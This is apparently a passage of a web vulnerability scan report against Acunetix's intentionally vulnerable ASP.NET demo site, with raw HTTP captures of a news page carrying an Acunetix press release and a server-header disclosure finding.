vtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMg